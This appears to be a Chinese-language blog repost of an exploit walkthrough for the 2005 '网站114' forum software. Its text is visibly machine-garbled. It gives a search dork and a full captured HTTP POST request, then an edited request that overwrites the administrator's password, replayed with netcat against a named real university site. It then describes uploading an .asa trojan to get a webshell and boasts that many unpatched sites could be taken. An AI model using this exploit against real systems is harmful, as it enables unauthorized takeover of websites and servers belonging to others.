网站114论坛 2005正式版漏洞
关键字:
"版权全部 设计制造:网站114"
漏洞描述:
网站114论坛 2005版正式
/edituserdb.asp
对提交数据和cooikes缺乏验证
招致恣意用户可以修正办理员密码
默许后台admin/index.asp
今天在旁注一个机房的呆板时用了一下。
http://www.gxmu.net.cn/xzl/BBS/index.asp
广西医科大学网站上的一个论坛。
注册了一个用户33221.
然后跳转到 /edituserdb.asp,单击“修正注册”开端抓包!
用记事本保存抓包内容如下:
-----------------------------------------------------------------------------------------------------------
POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.gxmu.net.cn/xzl/BBS//edituserdb.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
Host: www.gxmu.net.cn
Content-Length: 2304
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserName"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="selSex"
老师
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtNick"
11
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtProvince"
111
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAddress"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPostCode"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTel"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtMobile"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtFax"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtEmail"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUrl"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtfile"; filename=""
Content-Type: application/octet-stream
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtOicq"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtDocument"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="submit"
修正注册信息
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtId"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTempId"
-----------------------------7d61e41d605f6--
------------------------------------------------------------------------------------------------------------
此中:“
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"
33221
-----------------------------7d61e41d605f6
”
修正第一个"33221"为“admin”保存11.txt文本为:
POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.gxmu.net.cn/xzl/BBS//edituserdb.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
Host: www.gxmu.net.cn
Content-Length: 2304
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"
admin
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserName"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="selSex"
老师
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtNick"
11
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtProvince"
111
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAddress"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPostCode"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTel"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtMobile"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtFax"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtEmail"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUrl"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtfile"; filename=""
Content-Type: application/octet-stream
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtOicq"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtDocument"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="submit"
修正注册信息
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtId"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTempId"
-----------------------------7d61e41d605f6--
这里因为我注册的用户名33221与admin长度一至,所以这里不用修正字节长度。
然后用nc提交到办事器
nc www.gxmu.net.cn 80 <11.txt
返回提示修正会员材料成功。
然后用admin 密码为申请33221的密码一至登录。
当然便是办理员权限了,然后登录后台,点击“修正栏目”,上传asa木马,ok,拿到webshll。
看了一下,这个论坛系统还没有出补丁,可以拿大批webshell了,不外我只要了对我比较有用的一个办事器,其它的没有去抓了。
另有不明白的,可以看下动画演示,http://www.ncph.net/soft/114论坛最新漏洞使用动画.rar
渣滓漏洞,这里是弄给菜鸟看的,高人不要骂我。
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
